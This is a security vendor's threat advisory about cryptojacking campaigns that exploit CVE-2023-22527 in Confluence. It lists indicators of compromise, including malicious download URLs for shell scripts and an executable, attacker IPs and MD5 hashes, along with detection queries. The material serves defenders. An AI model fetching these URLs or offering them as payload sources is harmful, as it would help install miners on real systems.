Cryptojacking via CVE-2023-22527: Dissecting a Full-Scale Cryptomining Ecosystem

    Thursday, August 29, 2024 In: Threat Research Print

    Date: 08/29/2024

    Severity: High

    Summary

    The CVE-2023-22527 vulnerability is being exploited for cryptojacking, converting affected systems into cryptomining networks. Attackers use shell scripts, XMRig miners, and target SSH endpoints, while ensuring persistence with cron jobs. Organizations should update Confluence to the latest version and apply robust security measures to protect their systems.

    Indicators of Compromise (IOC) List

    Domains\Urls

    http://95.85.93.196:80/h4

    http://45.144.3.216:10000/solr.sh

    http://45.144.3.216:10000/starrail/cbt2zip/setup.exe

    http://45.144.3.216:10000/rnv2ymcl

    http://45.144.3.216:10000/starrail/config/v2.json

    http://175.118.126.65:8002/js/l.txt

    IP Address 

    45.144.3.216

    175.118.126.65

    Hash

    b3bfc68de683391e674ada5ce72b584b

9741b569c88166bbc9bbdc2dea6797b9

a53a9ca8a074c7108f8412c3f8c1fc5d

2833c82055bf2d29c65cd9cf6684449a

2e32d010e8c85a608022b317e5cb1fa7

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Domains\Urls

    userdomainname like "http://95.85.93.196:80/h4" or url like "http://95.85.93.196:80/h4" or userdomainname like "http://45.144.3.216:10000/solr.sh" or url like "http://45.144.3.216:10000/solr.sh" or userdomainname like "http://45.144.3.216:10000/starrail/cbt2zip/setup.exe" or url like "http://45.144.3.216:10000/starrail/cbt2zip/setup.exe" or userdomainname like "http://45.144.3.216:10000/rnv2ymcl" or url like "http://45.144.3.216:10000/rnv2ymcl" or userdomainname like "http://45.144.3.216:10000/starrail/config/v2.json" or url like "http://45.144.3.216:10000/starrail/config/v2.json" or userdomainname like "http://175.118.126.65:8002/js/l.txt" or url like "http://175.118.126.65:8002/js/l.txt"

    IP Address

    dstipaddress IN ("45.144.3.216","175.118.126.65") or ipaddress IN ("45.144.3.216","175.118.126.65") or publicipaddress IN ("45.144.3.216","175.118.126.65") or srcipaddress IN ("45.144.3.216","175.118.126.65")

    Hash

    md5hash IN ("b3bfc68de683391e674ada5ce72b584b","9741b569c88166bbc9bbdc2dea6797b9","a53a9ca8a074c7108f8412c3f8c1fc5d","2833c82055bf2d29c65cd9cf6684449a","2e32d010e8c85a608022b317e5cb1fa7")

    Reference:

    https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html 


    Tags

    MalwareExploitation

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.